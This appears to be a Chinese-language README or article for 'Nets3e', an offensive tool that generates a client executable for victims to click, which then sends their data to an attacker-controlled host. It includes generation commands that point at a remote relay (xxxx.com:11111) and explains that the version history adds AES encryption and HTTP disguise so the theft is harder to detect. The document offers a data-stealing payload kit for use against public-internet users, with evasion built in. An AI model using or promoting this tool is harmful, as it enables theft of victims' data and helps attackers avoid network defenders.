Github==>https://github.com/MartinxMax/Nets3e
首页
历史更新:
Nets3e v1.1.2 废弃Base64编码传输,新增AES加密选项,将数据包混淆在正常的http请求中,并且进行加密传输,增大被中间人截获数据破解的难度
Nets3e v1.1.1 在Nets3e v1.0.0基础上将代码进行了优化瘦身,并且提高稳定性,新增 debug内网最短路径攻击功能(通常用来测试主要功能是否存在异常)
基础使用
#python3 Nets3e.py -h
公网攻击示例
生成Payload
#python3 Nets3e.py -rh http://xxxx.com:11111 -g
公网受害者点击Nets3eClient_release.exe
公网杀链
局域网攻击示例
生成Payload
#python3 Nets3e.py -g
公网受害者点击Nets3eClient_debug.exe
局域网杀链
Payload注意事项
生成前
-lp:设置本机监听端口(默认10032)
-lh:设置本机监听IP(默认当前网卡IP)
-rh:进行流量转发的远程主机,协议是TCP不过这里要改成HTTP进行生成
-g :生成PAYLOAD,如果你已经生成了payload将无需使用该参数
-salt xxx :将受害者的数据传输前进行AES加密防止中间人嗅探
生成后
Nets3eClient_debug.exe->局域网攻击的调试版本主要用于测试内部网络受害者数据是否能够到达本地机器
Nets3eClient_release.exe->公网攻击的发布版本主要用于攻击公网用户
为什么传输中要将受害者数据进行加密?
增大破解难度
Nets3e v1.1.1 以前
受害者将数据直接base64编码传输,导致数据极其容易被嗅探分析,攻击者攻击行为将异常明显
Nets3e v1.1.2 最新
废弃base64编码后传输,采用AES对称加密,受害者将数据进行带盐加密后再传输数据给攻击者
为什么要使用http传输?
采用TCP太过于明显,这里将发送给攻击者的流量包伪装混淆至正常的http请求中。
from https://www.freebuf.com/articles/web/368915.html